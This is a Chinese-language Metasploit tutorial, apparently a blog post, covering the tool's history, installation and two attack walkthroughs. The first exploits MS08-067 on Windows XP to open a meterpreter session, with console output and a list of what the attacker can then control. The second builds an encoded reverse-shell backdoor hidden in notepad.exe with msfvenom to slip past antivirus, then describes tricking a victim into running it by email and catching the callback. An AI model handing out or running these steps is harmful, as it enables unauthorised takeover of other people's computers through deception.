____________________________________________________________________________________________________________________________________________-
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
功能包括:智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
简史:2004年8月,在拉斯维加斯如开了一次世界黑客交流会—黑帽简报(Black Hat Briefings). 在这个会议上,一款叫Metasploit 的攻击和渗透工具备受众黑客关注,出尽了风头。
Ps(说人话)metasploit渗透测试框架,是安全研究人员手上必不可少的工具之一
____________________________________________________________________________________________________________________________________________-
Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。
攻击者可以将来漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,然后通过Metasploit的模块来确定漏洞。一旦发现了漏洞,攻击者就可以采取一种可行方法攻击系统,通过Shell或启动Metasploit的meterpreter来控制这个系统。
Metasploit的目标是,永远支持开源软件,促进社区参与,并提供最具创新性的渗透测试人员在世界各地的资源和工具。除了探索商业解决方案,致力于保持免费和开源的Metasploit框架.
____________________________________________________________________________________________________________________________________________-
(kali linux本身有自带,如果已经装有kali linux的小伙伴可以忽略)
1 打开linux控制台,切换到root权限。
2 安装curl
apt-get install -y curl
3 下载metasploit安装文件
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
msfconsole
使用比较麻烦,建议还是装个虚拟机用Linux吧
____________________________________________________________________________________________________________________________________________-
# msfconsole
msf > search platform: windows xp sp3
msf > info exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.0.108 (设置目标主机IP地址)
> exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.0.108
[*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32
meterpreter >
现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。
利用后门程序侵入Windows
____________________________________________________________________________________________________________________________________________-
原理:在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)
难点是需要过杀毒软件和防火墙。
1 生成后门程序并隐藏;
2 我们把后门程序隐藏到记事本程序中:notepad.exe
3 查看Kali Linux的IP:
ifconfig(192.146.0.112)
4 创建后门程序,my_backdoor.exe:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.146.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe
5 把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。
6 启动msfconsole:
# msfconsole
use exploit/multi/handler
set LHOST 192.146.0.112
set LPORT 4445
set payload windows/meterpreter/reverse_tcp
show options
exploit